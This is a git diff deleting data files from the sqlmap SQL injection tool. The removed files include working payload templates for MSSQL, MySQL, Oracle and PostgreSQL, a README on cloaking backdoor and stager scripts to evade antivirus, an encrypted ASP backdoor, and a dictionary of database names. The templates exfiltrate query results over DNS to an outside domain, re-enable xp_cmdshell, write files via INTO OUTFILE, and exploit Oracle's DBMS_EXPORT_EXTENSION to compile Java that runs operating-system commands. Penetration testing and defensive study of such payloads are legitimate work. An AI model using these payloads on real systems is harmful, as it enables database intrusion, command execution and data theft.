--- a/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
+++ /dev/null
@@ -1 +0,0 @@
-EXEC master..sp_dropextendedproc 'xp_cmdshell'
diff --git a/data/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql
deleted file mode 100644
index a269c7e16f8..00000000000
--- a/data/procs/mssqlserver/dns_request.sql
+++ /dev/null
@@ -1,4 +0,0 @@
-DECLARE @host varchar(1024);
-SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
-EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
-# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
diff --git a/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
deleted file mode 100644
index 2ec155222a0..00000000000
--- a/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
+++ /dev/null
@@ -1 +0,0 @@
-EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
diff --git a/data/procs/mssqlserver/run_statement_as_user.sql b/data/procs/mssqlserver/run_statement_as_user.sql
deleted file mode 100644
index 575c22ef590..00000000000
--- a/data/procs/mssqlserver/run_statement_as_user.sql
+++ /dev/null
@@ -1,3 +0,0 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
-# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
-# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
diff --git a/data/procs/mysql/dns_request.sql b/data/procs/mysql/dns_request.sql
deleted file mode 100644
index e32fc478d94..00000000000
--- a/data/procs/mysql/dns_request.sql
+++ /dev/null
@@ -1 +0,0 @@
-SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))
diff --git a/data/procs/mysql/write_file_limit.sql b/data/procs/mysql/write_file_limit.sql
deleted file mode 100644
index e879fbe4030..00000000000
--- a/data/procs/mysql/write_file_limit.sql
+++ /dev/null
@@ -1 +0,0 @@
-LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -
diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
deleted file mode 100644
index 5dda762c08d..00000000000
--- a/data/procs/oracle/dns_request.sql
+++ /dev/null
@@ -1,3 +0,0 @@
-SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
-# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
-# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
diff --git a/data/procs/oracle/read_file_export_extension.sql b/data/procs/oracle/read_file_export_extension.sql
deleted file mode 100644
index 3d66bbaf53d..00000000000
--- a/data/procs/oracle/read_file_export_extension.sql
+++ /dev/null
@@ -1,4 +0,0 @@
-SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
-SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
-SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
-SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
diff --git a/data/procs/postgresql/dns_request.sql b/data/procs/postgresql/dns_request.sql
deleted file mode 100644
index 6724af223cc..00000000000
--- a/data/procs/postgresql/dns_request.sql
+++ /dev/null
@@ -1,14 +0,0 @@
-DROP TABLE IF EXISTS %RANDSTR1%;
-# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
-CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
-CREATE OR REPLACE FUNCTION %RANDSTR3%()
-RETURNS VOID AS $$
-DECLARE %RANDSTR4% TEXT;
-DECLARE %RANDSTR5% TEXT;
-BEGIN
-SELECT INTO %RANDSTR5% (%QUERY%);
-%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
-EXECUTE %RANDSTR4%;
-END;
-$$ LANGUAGE plpgsql SECURITY DEFINER;
-SELECT %RANDSTR3%();
\ No newline at end of file
diff --git a/data/shell/README.txt b/data/shell/README.txt
deleted file mode 100644
index 4c64c411648..00000000000
--- a/data/shell/README.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
-
-To prepare the original scripts to the cloaked form use this command:
-find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
-
-To get back them into the original form use this:
-find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
deleted file mode 100644
index bc912038c7d..00000000000
--- a/data/shell/backdoors/backdoor.asp_
+++ /dev/null
@@ -1,3 +0,0 @@
-=ܩt bRU&hR}DtC!3y>7 pQMb-{Y?=lٲ]6a\5
-]iZ*pO|SkC)1Os|Ef@l{a2(Pr8Cөn%fߚ A=@(x~ֱ$ˉ)9= 5.0
-'debian-sys-maint'@'localhost'
-'root'@'%'
-'root'@'localhost'
-
-# MySQL < 5.0
-debian-sys-maint
-root
-
-# PostgreSQL
-postgres
-
-# Oracle
-ANONYMOUS
-CTXSYS
-DBSNMP
-DIP
-DMSYS
-EXFSYS
-MDDATA
-MDSYS
-MGMT_VIEW
-OLAPSYS
-ORDPLUGINS
-ORDSYS
-OUTLN
-SCOTT
-SI_INFORMTN_SCHEMA
-SYS
-SYSMAN
-SYSTEM
-TSMSYS
-WMSYS
-XDB
-
-# Microsoft SQL Server
-sa
-
-
-[Passwords]
-
-# MySQL
-*00E247AC5F9AF26AE0194B41E1E769DEE1429A29 # testpass
-
-# PostgreSQL
-md599e5ea7a6f7c3269995cba3927fd0093 # testpass
-
-# Oracle
-2D5A0C491B634F1B # testpass
-
-# Microsoft SQL Server
-0x0100098a6200f657f7d012dfa7dc1fd1b154d4dfb8cd20596d22 # testpass
-
-
-[Privileges]
-
-# MySQL >= 5.0
-ALTER
-ALTER ROUTINE
-CREATE
-CREATE ROUTINE
-CREATE TEMPORARY TABLES
-CREATE USER
-CREATE VIEW
-DELETE
-DROP
-EVENT
-EXECUTE
-FILE
-INDEX
-INSERT
-LOCK TABLES
-PROCESS
-REFERENCES
-RELOAD
-REPLICATION CLIENT
-REPLICATION SLAVE
-SELECT
-SHOW DATABASES
-SHOW VIEW
-SHUTDOWN
-SUPER
-TRIGGER
-UPDATE
-USAGE
-
-# MySQL < 5.0
-select_priv
-insert_priv
-update_priv
-delete_priv
-create_priv
-drop_priv
-reload_priv
-shutdown_priv
-process_priv
-file_priv
-grant_priv
-references_priv
-index_priv
-alter_priv
-show_db_priv
-super_priv
-create_tmp_table_priv
-lock_tables_priv
-execute_priv
-repl_slave_priv
-repl_client_priv
-create_view_priv
-show_view_priv
-create_routine_priv
-alter_routine_priv
-create_user_priv
-
-# PostgreSQL
-catupd
-createdb
-super
-
-# Oracle
-ADMINISTER ANY SQL TUNING SET
-ADMINISTER DATABASE TRIGGER
-ADMINISTER RESOURCE MANAGER
-ADMINISTER SQL TUNING SET
-ADVISOR
-ALTER ANY CLUSTER
-ALTER ANY DIMENSION
-ALTER ANY EVALUATION CONTEXT
-ALTER ANY INDEX
-ALTER ANY INDEXTYPE
-ALTER ANY LIBRARY
-ALTER ANY MATERIALIZED VIEW
-ALTER ANY OUTLINE
-ALTER ANY PROCEDURE
-ALTER ANY ROLE
-ALTER ANY RULE
-ALTER ANY RULE SET
-ALTER ANY SEQUENCE
-ALTER ANY SQL PROFILE
-ALTER ANY TABLE
-ALTER ANY TRIGGER
-ALTER ANY TYPE
-ALTER DATABASE
-ALTER PROFILE
-ALTER RESOURCE COST
-ALTER ROLLBACK SEGMENT
-ALTER SESSION
-ALTER SYSTEM
-ALTER TABLESPACE
-ALTER USER
-ANALYZE ANY
-ANALYZE ANY DICTIONARY
-AUDIT ANY
-AUDIT SYSTEM
-BACKUP ANY TABLE
-BECOME USER
-CHANGE NOTIFICATION
-COMMENT ANY TABLE
-CREATE ANY CLUSTER
-CREATE ANY CONTEXT
-CREATE ANY DIMENSION
-CREATE ANY DIRECTORY
-CREATE ANY EVALUATION CONTEXT
-CREATE ANY INDEX
-CREATE ANY INDEXTYPE
-CREATE ANY JOB
-CREATE ANY LIBRARY
-CREATE ANY MATERIALIZED VIEW
-CREATE ANY OPERATOR
-CREATE ANY OUTLINE
-CREATE ANY PROCEDURE
-CREATE ANY RULE
-CREATE ANY RULE SET
-CREATE ANY SEQUENCE
-CREATE ANY SQL PROFILE
-CREATE ANY SYNONYM
-CREATE ANY TABLE
-CREATE ANY TRIGGER
-CREATE ANY TYPE
-CREATE ANY VIEW
-CREATE CLUSTER
-CREATE DATABASE LINK
-CREATE DIMENSION
-CREATE EVALUATION CONTEXT
-CREATE EXTERNAL JOB
-CREATE INDEXTYPE
-CREATE JOB
-CREATE LIBRARY
-CREATE MATERIALIZED VIEW
-CREATE OPERATOR
-CREATE PROCEDURE
-CREATE PROFILE
-CREATE PUBLIC DATABASE LINK
-CREATE PUBLIC SYNONYM
-CREATE ROLE
-CREATE ROLLBACK SEGMENT
-CREATE RULE
-CREATE RULE SET
-CREATE SEQUENCE
-CREATE SESSION
-CREATE SYNONYM
-CREATE TABLE
-CREATE TABLESPACE
-CREATE TRIGGER
-CREATE TYPE
-CREATE USER
-CREATE VIEW
-DEBUG ANY PROCEDURE
-DEBUG CONNECT SESSION
-DELETE ANY TABLE
-DEQUEUE ANY QUEUE
-DROP ANY CLUSTER
-DROP ANY CONTEXT
-DROP ANY DIMENSION
-DROP ANY DIRECTORY
-DROP ANY EVALUATION CONTEXT
-DROP ANY INDEX
-DROP ANY INDEXTYPE
-DROP ANY LIBRARY
-DROP ANY MATERIALIZED VIEW
-DROP ANY OPERATOR
-DROP ANY OUTLINE
-DROP ANY PROCEDURE
-DROP ANY ROLE
-DROP ANY RULE
-DROP ANY RULE SET
-DROP ANY SEQUENCE
-DROP ANY SQL PROFILE
-DROP ANY SYNONYM
-DROP ANY TABLE
-DROP ANY TRIGGER
-DROP ANY TYPE
-DROP ANY VIEW
-DROP PROFILE
-DROP PUBLIC DATABASE LINK
-DROP PUBLIC SYNONYM
-DROP ROLLBACK SEGMENT
-DROP TABLESPACE
-DROP USER
-ENQUEUE ANY QUEUE
-EXECUTE ANY CLASS
-EXECUTE ANY EVALUATION CONTEXT
-EXECUTE ANY INDEXTYPE
-EXECUTE ANY LIBRARY
-EXECUTE ANY OPERATOR
-EXECUTE ANY PROCEDURE
-EXECUTE ANY PROGRAM
-EXECUTE ANY RULE
-EXECUTE ANY RULE SET
-EXECUTE ANY TYPE
-EXPORT FULL DATABASE
-FLASHBACK ANY TABLE
-FORCE ANY TRANSACTION
-FORCE TRANSACTION
-GLOBAL QUERY REWRITE
-GRANT ANY OBJECT PRIVILEGE
-GRANT ANY PRIVILEGE
-GRANT ANY ROLE
-IMPORT FULL DATABASE
-INSERT ANY TABLE
-LOCK ANY TABLE
-MANAGE ANY FILE GROUP
-MANAGE ANY QUEUE
-MANAGE FILE GROUP
-MANAGE SCHEDULER
-MANAGE TABLESPACE
-MERGE ANY VIEW
-ON COMMIT REFRESH
-QUERY REWRITE
-READ ANY FILE GROUP
-RESTRICTED SESSION
-RESUMABLE
-SELECT ANY DICTIONARY
-SELECT ANY SEQUENCE
-SELECT ANY TABLE
-SELECT ANY TRANSACTION
-UNDER ANY TABLE
-UNDER ANY TYPE
-UNDER ANY VIEW
-UNLIMITED TABLESPACE
-UPDATE ANY TABLE
-
-
-[Roles]
-
-# Oracle
-AQ_ADMINISTRATOR_ROLE
-AQ_USER_ROLE
-AUTHENTICATEDUSER
-CONNECT
-CTXAPP
-DBA
-DELETE_CATALOG_ROLE
-EJBCLIENT
-EXECUTE_CATALOG_ROLE
-EXP_FULL_DATABASE
-GATHER_SYSTEM_STATISTICS
-HS_ADMIN_ROLE
-IMP_FULL_DATABASE
-JAVA_ADMIN
-JAVADEBUGPRIV
-JAVA_DEPLOY
-JAVAIDPRIV
-JAVASYSPRIV
-JAVAUSERPRIV
-LOGSTDBY_ADMINISTRATOR
-MGMT_USER
-OEM_ADVISOR
-OEM_MONITOR
-OLAP_DBA
-OLAP_USER
-RECOVERY_CATALOG_OWNER
-RESOURCE
-SCHEDULER_ADMIN
-SELECT_CATALOG_ROLE
-TABLE_ACCESSERS
-WM_ADMIN_ROLE
-XDBADMIN
-XDBWEBSERVICES
-
-
-[Databases]
-
-# MySQL
-information_schema
-performance_schema
-mysql
-phpmyadmin
-
-# PostgreSQL
-pg_catalog
-postgres
-public
-template0
-template1
-
-# Microsoft SQL Server
-AdventureWorks
-AdventureWorksDW
-master
-model
-msdb
-ReportServer
-ReportServerTempDB
-tempdb
-
-
-[Tables]
-
-# MySQL >= 5.0
-CHARACTER_SETS
-COLLATION_CHARACTER_SET_APPLICABILITY
-COLLATIONS
-COLUMN_PRIVILEGES
-COLUMNS
-ENGINES
-EVENTS
-FILES
-GLOBAL_STATUS
-GLOBAL_VARIABLES
-KEY_COLUMN_USAGE
-PARTITIONS
-PLUGINS
-PROCESSLIST
-PROFILING
-REFERENTIAL_CONSTRAINTS
-ROUTINES
-SCHEMA_PRIVILEGES
-SCHEMATA
-SESSION_STATUS
-SESSION_VARIABLES
-STATISTICS
-TABLE_CONSTRAINTS
-TABLE_PRIVILEGES
-TABLES
-TRIGGERS
-USER_PRIVILEGES
-VIEWS
-
-# MySQL
-columns_priv
-db
-event
-func
-general_log
-help_category
-help_keyword
-help_relation
-help_topic
-host
-ndb_binlog_index
-plugin
-proc
-procs_priv
-servers
-slow_log
-tables_priv
-time_zone
-time_zone_leap_second
-time_zone_name
-time_zone_transition
-time_zone_transition_type
-user
-
-# phpMyAdmin
-pma_bookmark
-pma_column_info
-pma_designer_coords
-pma_history
-pma_pdf_pages
-pma_relation
-pma_table_coords
-pma_table_info
-
-# Wordpress
-wp_users
-wp_posts
-wp_comments
-wp_options
-wp_postmeta
-wp_terms
-wp_term_taxonomy
-wp_term_relationships
-wp_links
-wp_commentmeta
-
-# WooCommerce
-wp_woocommerce_sessions
-wp_woocommerce_api_keys
-wp_woocommerce_attribute_taxonomies
-
-# Magento
-catalog_product_entity
-sales_order
-sales_order_item
-customer_entity
-quote
-
-# Drupal
-node
-users
-field_data_body
-field_revision_body
-taxonomy_term_data
-taxonomy_vocabulary
-
-# Joomla
-joomla_users
-joomla_content
-joomla_categories
-joomla_modules
-
-# PostgreSQL
-pg_aggregate
-pg_am
-pg_amop
-pg_amproc
-pg_attrdef
-pg_attribute
-pg_authid
-pg_auth_members
-pg_cast
-pg_class
-pg_constraint
-pg_conversion
-pg_cron_job
-pg_cron_job_run_detail
-pg_database
-pg_depend
-pg_description
-pg_enum
-pg_foreign_data_wrapper
-pg_foreign_server
-pg_index
-pg_inherits
-pg_language
-pg_largeobject
-pg_listener
-pg_namespace
-pg_opclass
-pg_operator
-pg_opfamily
-pg_pltemplate
-pg_proc
-pg_rewrite
-pg_shdepend
-pg_shdescription
-pg_statistic
-pg_stat_statements
-pg_tablespace
-pg_trigger
-pg_ts_config
-pg_ts_config_map
-pg_ts_dict
-pg_ts_parser
-pg_ts_template
-pg_type
-pg_user_mapping
-sql_features
-sql_implementation_info
-sql_languages
-sql_packages
-sql_parts
-sql_sizing
-sql_sizing_profiles
-
-# Oracle (demo database)
-BONUS
-DEPT
-EMP
-SALGRADE
-USERS
-
-# Microsoft SQL Server
-## Database: AdventureWorksDW
-AdventureWorksDWBuildVersion
-DatabaseLog
-DimAccount
-DimCurrency
-DimCustomer
-DimDepartmentGroup
-DimEmployee
-DimGeography
-DimOrganization
-DimProduct
-DimProductCategory
-DimProductSubcategory
-DimPromotion
-DimReseller
-DimSalesReason
-DimSalesTerritory
-DimScenario
-DimTime
-FactCurrencyRate
-FactFinance
-FactInternetSales
-FactInternetSalesReason
-FactResellerSales
-FactSalesQuota
-ProspectiveBuyer
-vAssocSeqLineItems
-vAssocSeqOrders
-vDMPrep
-vTargetMail
-vTimeSeries
-
-## Database: master
-all_columns
-all_objects
-all_parameters
-all_sql_modules
-all_views
-allocation_units
-assemblies
-assembly_files
-assembly_modules
-assembly_references
-assembly_types
-asymmetric_keys
-backup_devices
-certificates
-CHECK_CONSTRAINTS
-check_constraints
-COLUMN_DOMAIN_USAGE
-COLUMN_PRIVILEGES
-column_type_usages
-column_xml_schema_collection_usages
-columns
-COLUMNS
-computed_columns
-configurations
-CONSTRAINT_COLUMN_USAGE
-CONSTRAINT_TABLE_USAGE
-conversation_endpoints
-conversation_groups
-credentials
-crypt_properties
-data_spaces
-database_files
-database_mirroring
-database_mirroring_endpoints
-database_mirroring_witnesses
-database_permissions
-database_principal_aliases
-database_principals
-database_recovery_status
-database_role_members
-databases
-default_constraints
-destination_data_spaces
-dm_broker_activated_tasks
-dm_broker_connections
-dm_broker_forwarded_messages
-dm_broker_queue_monitors
-dm_clr_appdomains
-dm_clr_loaded_assemblies
-dm_clr_properties
-dm_clr_tasks
-dm_db_file_space_usage
-dm_db_index_usage_stats
-dm_db_mirroring_connections
-dm_db_missing_index_details
-dm_db_missing_index_group_stats
-dm_db_missing_index_groups
-dm_db_partition_stats
-dm_db_session_space_usage
-dm_db_task_space_usage
-dm_exec_background_job_queue
-dm_exec_background_job_queue_stats
-dm_exec_cached_plans
-dm_exec_connections
-dm_exec_query_optimizer_info
-dm_exec_query_stats
-dm_exec_query_transformation_stats
-dm_exec_requests
-dm_exec_sessions
-dm_fts_active_catalogs
-dm_fts_index_population
-dm_fts_memory_buffers
-dm_fts_memory_pools
-dm_fts_population_ranges
-dm_io_backup_tapes
-dm_io_cluster_shared_drives
-dm_io_pending_io_requests
-dm_os_buffer_descriptors
-dm_os_child_instances
-dm_os_cluster_nodes
-dm_os_hosts
-dm_os_latch_stats
-dm_os_loaded_modules
-dm_os_memory_allocations
-dm_os_memory_cache_clock_hands
-dm_os_memory_cache_counters
-dm_os_memory_cache_entries
-dm_os_memory_cache_hash_tables
-dm_os_memory_clerks
-dm_os_memory_objects
-dm_os_memory_pools
-dm_os_performance_counters
-dm_os_ring_buffers
-dm_os_schedulers
-dm_os_stacks
-dm_os_sublatches
-dm_os_sys_info
-dm_os_tasks
-dm_os_threads
-dm_os_virtual_address_dump
-dm_os_wait_stats
-dm_os_waiting_tasks
-dm_os_worker_local_storage
-dm_os_workers
-dm_qn_subscriptions
-dm_repl_articles
-dm_repl_schemas
-dm_repl_tranhash
-dm_repl_traninfo
-dm_tran_active_snapshot_database_transactions
-dm_tran_active_transactions
-dm_tran_current_snapshot
-dm_tran_current_transaction
-dm_tran_database_transactions
-dm_tran_locks
-dm_tran_session_transactions
-dm_tran_top_version_generators
-dm_tran_transactions_snapshot
-dm_tran_version_store
-DOMAIN_CONSTRAINTS
-DOMAINS
-endpoint_webmethods
-endpoints
-event_notification_event_types
-event_notifications
-events
-extended_procedures
-extended_properties
-filegroups
-foreign_key_columns
-foreign_keys
-fulltext_catalogs
-fulltext_document_types
-fulltext_index_catalog_usages
-fulltext_index_columns
-fulltext_indexes
-fulltext_languages
-http_endpoints
-identity_columns
-index_columns
-indexes
-internal_tables
-KEY_COLUMN_USAGE
-key_constraints
-key_encryptions
-linked_logins
-login_token
-master_files
-master_key_passwords
-message_type_xml_schema_collection_usages
-messages
-module_assembly_usages
-MSreplication_options
-numbered_procedure_parameters
-numbered_procedures
-objects
-openkeys
-parameter_type_usages
-parameter_xml_schema_collection_usages
-parameters
-PARAMETERS
-partition_functions
-partition_parameters
-partition_range_values
-partition_schemes
-partitions
-plan_guides
-procedures
-REFERENTIAL_CONSTRAINTS
-remote_logins
-remote_service_bindings
-routes
-ROUTINE_COLUMNS
-ROUTINES
-schemas
-SCHEMATA
-securable_classes
-server_assembly_modules
-server_event_notifications
-server_events
-server_permissions
-server_principals
-server_role_members
-server_sql_modules
-server_trigger_events
-server_triggers
-servers
-service_broker_endpoints
-service_contract_message_usages
-service_contract_usages
-service_contracts
-service_message_types
-service_queue_usages
-service_queues
-services
-soap_endpoints
-spt_fallback_db
-spt_fallback_dev
-spt_fallback_usg
-spt_monitor
-spt_values
-sql_dependencies
-sql_logins
-sql_modules
-stats
-stats_columns
-symmetric_keys
-synonyms
-sysaltfiles
-syscacheobjects
-syscharsets
-syscolumns
-syscomments
-sysconfigures
-sysconstraints
-syscurconfigs
-syscursorcolumns
-syscursorrefs
-syscursors
-syscursortables
-sysdatabases
-sysdepends
-sysdevices
-sysfilegroups
-sysfiles
-sysforeignkeys
-sysfulltextcatalogs
-sysindexes
-sysindexkeys
-syslanguages
-syslockinfo
-syslogins
-sysmembers
-sysmessages
-sysobjects
-sysoledbusers
-sysopentapes
-sysperfinfo
-syspermissions
-sysprocesses
-sysprotects
-sysreferences
-sysremotelogins
-syssegments
-sysservers
-system_columns
-system_components_surface_area_configuration
-system_internals_allocation_units
-system_internals_partition_columns
-system_internals_partitions
-system_objects
-system_parameters
-system_sql_modules
-system_views
-systypes
-sysusers
-TABLE_CONSTRAINTS
-TABLE_PRIVILEGES
-TABLES
-tables
-tcp_endpoints
-trace_categories
-trace_columns
-trace_event_bindings
-trace_events
-trace_subclass_values
-traces
-transmission_queue
-trigger_events
-triggers
-type_assembly_usages
-types
-user_token
-via_endpoints
-VIEW_COLUMN_USAGE
-VIEW_TABLE_USAGE
-views
-VIEWS
-xml_indexes
-xml_schema_attributes
-xml_schema_collections
-xml_schema_component_placements
-xml_schema_components
-xml_schema_elements
-xml_schema_facets
-xml_schema_model_groups
-xml_schema_namespaces
-xml_schema_types
-xml_schema_wildcard_namespaces
-xml_schema_wildcards
-
-## Database: msdb
-backupfile
-backupfilegroup
-backupmediafamily
-backupmediaset
-backupset
-log_shipping_monitor_alert
-log_shipping_monitor_error_detail
-log_shipping_monitor_history_detail
-log_shipping_monitor_primary
-log_shipping_monitor_secondary
-log_shipping_primaries
-log_shipping_primary_databases
-log_shipping_primary_secondaries
-log_shipping_secondaries
-log_shipping_secondary
-log_shipping_secondary_databases
-logmarkhistory
-MSdatatype_mappings
-MSdbms
-MSdbms_datatype
-MSdbms_datatype_mapping
-MSdbms_map
-restorefile
-restorefilegroup
-restorehistory
-sqlagent_info
-suspect_pages
-sysalerts
-syscachedcredentials
-syscategories
-sysdatatypemappings
-sysdbmaintplan_databases
-sysdbmaintplan_history
-sysdbmaintplan_jobs
-sysdbmaintplans
-sysdownloadlist
-sysdtscategories
-sysdtslog90
-sysdtspackagefolders90
-sysdtspackagelog
-sysdtspackages
-sysdtspackages90
-sysdtssteplog
-sysdtstasklog
-sysjobactivity
-sysjobhistory
-sysjobs
-sysjobs_view
-sysjobschedules
-sysjobservers
-sysjobsteps
-sysjobstepslogs
-sysmail_account
-sysmail_allitems
-sysmail_attachments
-sysmail_attachments_transfer
-sysmail_configuration
-sysmail_event_log
-sysmail_faileditems
-sysmail_log
-sysmail_mailattachments
-sysmail_mailitems
-sysmail_principalprofile
-sysmail_profile
-sysmail_profileaccount
-sysmail_query_transfer
-sysmail_send_retries
-sysmail_sentitems
-sysmail_server
-sysmail_servertype
-sysmail_unsentitems
-sysmaintplan_log
-sysmaintplan_logdetail
-sysmaintplan_plans
-sysmaintplan_subplans
-sysnotifications
-sysoperators
-sysoriginatingservers
-sysoriginatingservers_view
-sysproxies
-sysproxylogin
-sysproxyloginsubsystem_view
-sysproxysubsystem
-sysschedules
-sysschedules_localserver_view
-syssessions
-syssubsystems
-systargetservergroupmembers
-systargetservergroups
-systargetservers
-systargetservers_view
-systaskids
-
-## Database: AdventureWorks
-Address
-AddressType
-AWBuildVersion
-BillOfMaterials
-Contact
-ContactCreditCard
-ContactType
-CountryRegion
-CountryRegionCurrency
-CreditCard
-Culture
-Currency
-CurrencyRate
-Customer
-CustomerAddress
-DatabaseLog
-Department
-Document
-Employee
-EmployeeAddress
-EmployeeDepartmentHistory
-EmployeePayHistory
-ErrorLog
-Illustration
-Individual
-JobCandidate
-Location
-Product
-ProductCategory
-ProductCostHistory
-ProductDescription
-ProductDocument
-ProductInventory
-ProductListPriceHistory
-ProductModel
-ProductModelIllustration
-ProductModelProductDescriptionCulture
-ProductPhoto
-ProductProductPhoto
-ProductReview
-ProductSubcategory
-ProductVendor
-PurchaseOrderDetail
-PurchaseOrderHeader
-SalesOrderDetail
-SalesOrderHeader
-SalesOrderHeaderSalesReason
-SalesPerson
-SalesPersonQuotaHistory
-SalesReason
-SalesTaxRate
-SalesTerritory
-SalesTerritoryHistory
-ScrapReason
-Shift
-ShipMethod
-ShoppingCartItem
-SpecialOffer
-SpecialOfferProduct
-StateProvince
-Store
-StoreContact
-TransactionHistory
-TransactionHistoryArchive
-UnitMeasure
-vAdditionalContactInfo
-vEmployee
-vEmployeeDepartment
-vEmployeeDepartmentHistory
-Vendor
-VendorAddress
-VendorContact
-vIndividualCustomer
-vIndividualDemographics
-vJobCandidate
-vJobCandidateEducation
-vJobCandidateEmployment
-vProductAndDescription
-vProductModelCatalogDescription
-vProductModelInstructions
-vSalesPerson
-vSalesPersonSalesByFiscalYears
-vStateProvinceCountryRegion
-vStoreWithDemographics
-vVendor
-WorkOrder
-WorkOrderRouting
-
-
-[Columns]
-
-# MySQL
-## Table: mysql.user
-Alter_priv
-Alter_routine_priv
-Create_priv
-Create_routine_priv
-Create_tmp_table_priv
-Create_user_priv
-Create_view_priv
-Delete_priv
-Drop_priv
-Event_priv
-Execute_priv
-File_priv
-Grant_priv
-Host
-Index_priv
-Insert_priv
-Lock_tables_priv
-max_connections
-max_questions
-max_updates
-max_user_connections
-Password
-Process_priv
-References_priv
-Reload_priv
-Repl_client_priv
-Repl_slave_priv
-Select_priv
-Show_db_priv
-Show_view_priv
-Shutdown_priv
-ssl_cipher
-ssl_type
-Super_priv
-Trigger_priv
-Update_priv
-User
-x509_issuer
-x509_subject
-
-# Oracle (types)
-BINARY_INTEGER
-BLOB
-BOOLEAN
-CHAR
-CLOB
-DATE
-INTERVAL
-LONG
-MLSLABEL
-NCHAR
-NCLOB
-NUMBER
-NVARCHAR2
-RAW
-ROWID
-TIMESTAMP
-VARCHAR
-VARCHAR2
-XMLType
-
-# MySQL (types)
-bigint
-blob
-char
-date
-datetime
-decimal
-double
-enum
-float
-int
-set
-smallint
-text
-time
-tinyint
-varchar
-year
-
-# Microsoft SQL Server (types)
-bigint
-binary
-bit
-char
-cursor
-date
-datetime
-datetime2
-datetimeoffset
-decimal
-float
-image
-int
-money
-nchar
-ntext
-numeric
-nvarchar
-real
-smalldatetime
-smallint
-smallmoney
-sql_variant
-table
-text
-time
-timestamp
-tinyint
-uniqueidentifier
-varbinary
-varchar
-xml
-
-# PostgreSQL (types)
-bigint
-bigserial
-boolean
-bpchar
-bytea
-character
-date
-decimal
-double precision
-int4
-integer
-interval
-money
-numeric
-real
-serial
-smallint
-text
-time
-timestamp
-
-# common columns
-created_at
-updated_at
